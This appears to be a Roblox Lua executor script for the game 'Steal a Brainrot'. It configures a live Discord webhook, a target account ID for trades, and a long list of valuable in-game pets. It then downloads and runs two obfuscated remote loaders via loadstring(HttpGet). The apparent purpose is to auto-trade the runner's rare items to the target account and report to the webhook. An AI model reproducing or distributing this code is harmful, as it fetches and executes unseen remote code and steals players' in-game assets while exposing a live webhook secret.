-- 1. SET CONFIGURATION FIRST
getgenv().WEBHOOK_URL = "https://discordapp.com/api/webhooks/1465858271880679569/NgYYOPDE2Zfx1v9qvptPEoCeNQTV3KkxNWZyuJQfSQOmCUMG5A-vMUmuKjOWJqQkkWft"
getgenv().TARGET_ID = 7236992272  -- ID аккаунта для трейда
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Garama and Madundung"] = true,
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Spooky Grande"] = true,
    ["La Extinct Grande"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["La Taco Combinasion"] = true,
    ["La Jolly Grande"] = true,
    ["W or L"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Tuff Toucan"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Tictac Sahur"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Guest 666"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["La Ginger Sekolah"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["Fishino Clownino"] = true,
    ["Eviledon"] = true,
    ["Orcaledon"] = true,
    ["Money Money Reindeer"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["La Secret Combinasion"] = true,
    ["La Food Combinasion"] = true,
    ["Sammyni Fattini"] = true,
    ["Rosetti Tualetti"] = true,
    ["Lovin Rose"] = true,
    ["Los Amigos"] = true
}

-- 2. Run the FIRST script in the background (prevents blocking)
task.spawn(function()
    loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/0fbe1cfb1005a43bbfeb46cd458b7f09.lua"))()
end)

-- 3. Wait exactly 1 second for the first script to initialize
task.wait(1)

-- 4. Execute the SECOND script
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
